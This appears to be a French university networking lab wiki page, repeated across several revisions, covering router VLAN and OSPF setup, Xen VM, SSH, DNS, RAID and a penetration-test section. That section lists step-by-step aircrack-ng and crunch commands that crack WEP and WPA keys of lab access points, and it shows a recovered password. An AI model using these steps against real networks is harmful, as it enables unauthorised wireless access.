<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 1H<br />
@ IN SOA ns.anosteke59.site (<br />
12 ; serial number YYMMDDNN<br />
1H ; Refresh<br />
1H ; Retry<br />
1D ; Expire<br />
1H ; Min TTL<br />
)<br />
IN NS ns.anosteke59.site.<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME WWW<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
=== Tests d’intrusion ===<br />
<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57683TP sysres IMA5 2021/2022 G72022-01-10T15:50:57Z<p>Avercaem : /* Sécurisation de données */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 1H<br />
@ IN SOA ns.anosteke59.site (<br />
12 ; serial number YYMMDDNN<br />
1H ; Refresh<br />
1H ; Retry<br />
1D ; Expire<br />
1H ; Min TTL<br />
)<br />
IN NS ns.anosteke59.site.<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME WWW<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
=== Tests d’intrusion ===<br />
<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57682TP sysres IMA5 2021/2022 G72022-01-10T15:50:14Z<p>Avercaem : /* Sécurisation de données */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 1H<br />
@ IN SOA ns.anosteke59.site (<br />
12 ; serial number YYMMDDNN<br />
1H ; Refresh<br />
1H ; Retry<br />
1D ; Expire<br />
1H ; Min TTL<br />
)<br />
IN NS ns.anosteke59.site.<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME WWW<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
=== Tests d’intrusion ===<br />
<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57681TP sysres IMA5 2021/2022 G72022-01-10T15:50:06Z<p>Avercaem : /* Réalisation */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
